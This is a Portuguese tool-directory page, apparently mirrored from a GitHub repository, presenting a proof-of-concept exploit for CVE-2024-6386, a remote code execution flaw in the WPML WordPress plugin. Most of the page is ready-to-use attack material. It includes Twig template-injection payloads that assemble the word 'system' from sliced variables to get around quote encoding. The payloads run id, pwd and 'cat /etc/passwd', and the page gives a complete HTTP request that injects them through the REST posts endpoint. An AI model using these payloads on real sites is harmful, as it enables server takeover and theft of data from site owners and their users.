Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-6386 — Research and PoC for CVE-2024-6386 | Kitploit
Ferramentas/GitHubGitHub/argendo/cve-2024-6386
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingPayload Development
GitHubargendo/cve-2024-6386

CVE-2024-6386

Research and PoC for CVE-2024-6386

Ver Repositório
5há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-6386 - RCE via Twig SSTI no WPML

PoC

PoC em Python+Selenium

Pesquisa detalhada em russo: CVE-2024-6386

Exemplo de PoC

CVSS

Pontuação Base: 9.9

Vetor: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Resumo

No WPML você pode usar Shortcodes do WordPress específicos que permitem criar macros e também renderizar templates Twig. Então você pode facilmente obter um SSTI a partir disso.

Cadeia

SSTI

Por exemplo, vamos criar um shortcode para explorar SSTI:

root@kitploit:~
[wpml_language_switcher]
{{ 2*2 }}
[/wpml_language_switcher]

Neste caso, obteremos 4 como resultado da renderização do nosso shortcode.

RCE

Devido à codificação de todos os tipos de aspas para HTML pelo WordPress, não somos capazes de usar payloads típicos, como:

root@kitploit:~
{{['id']|filter('system')}}

No entanto, podemos modificar esse payload para chamar comandos do SO a partir de variáveis-letras, como: (s = 's').

Para isso, precisamos chamar algumas variáveis locais, como:

  • css_classes
  • languages

A primeira nos retornará uma string: wpml-ls-statics-shortcode_actions wpml-ls. A segunda retorna um objeto Array de idiomas.

Com a ajuda disso, podemos fatiar os símbolos que precisamos e criar nosso próprio alfabeto.

Então, aqui criamos um alfabeto: [<space> ,a, c, i, d, s, y, t, e, m, p, w ]

E sim, devemos concatenar languages com um valor vazio para criar uma string com o valor "Array" a partir dela.

root@kitploit:~
{% set sp = css_classes|slice(33,1) %}
{% set a = css_classes|slice(10,1) %}
{% set c = css_classes|slice(13,1) %}
{% set i = css_classes|slice(12,1) %}
{% set d = css_classes|slice(23,1) %}
{% set s = css_classes|slice(6,1) %}
{% set y = languages|join|slice(4,1) %}
{% set t = css_classes|slice(9,1) %}
{% set e = css_classes|slice(24,1) %}
{% set m = css_classes|slice(2,1) %}
{% set p = css_classes|slice(1,1) %}
{% set w = css_classes|slice(0,1) %}

Então, depois disso, podemos concatenar nosso alfabeto em payloads:

root@kitploit:~
{% set system = s~y~s~t~e~m %}
{% set pwd = p~w~d %}
{% set id = i~d %}
{% set cat = c~a~t %}
{% set sl = [pwd]|map(system)|join|slice(0,1) %}
{% set passwd = c~a~t~sp~sl~e~t~c~sl~p~a~s~s~w~d %}
{{[id]|map(system)|join}}
{{[pwd]|map(system)|join}}
{{[passwd]|map(system)|join}}

Exploração com Burp Suite

Comando

root@kitploit:~
POST /wp-json/wp/v2/posts/30?_locale=user HTTP/1.1
Host: vulned.com

{
    "id":30,
    "content":"<!-- wp:shortcode -->\n[wpml_language_switcher]\n{% set sp = css_classes|slice(33,1) %}{% set a = css_classes|slice(10,1) %}{% set c = css_classes|slice(13,1) %}{% set i = css_classes|slice(12,1) %}{% set d = css_classes|slice(23,1) %}{% set s = css_classes|slice(6,1) %}{% set y = languages|join|slice(4,1) %}{% set t = css_classes|slice(9,1) %}{% set e = css_classes|slice(24,1) %}{% set m = css_classes|slice(2,1) %}{% set p = css_classes|slice(1,1) %}{% set w = css_classes|slice(0,1) %}{% set system = s~y~s~t~e~m %}{% set pwd = p~w~d %}{% set cat = c~a~t %}{% set sl = [pwd]|map(system)|join|slice(0,1) %}{% set id = i~d %}{% set passwd = c~a~t~sp~sl~e~t~c~sl~p~a~s~s~w~d %}{{[id]|map(system)|join}}\n[/wpml_language_switcher]<!-- /wp:shortcode -->"
}

Resultado da listagem

root@kitploit:~
GET /?p=30 HTTP/1.1
Host: vulned.com
Baixar ferramenta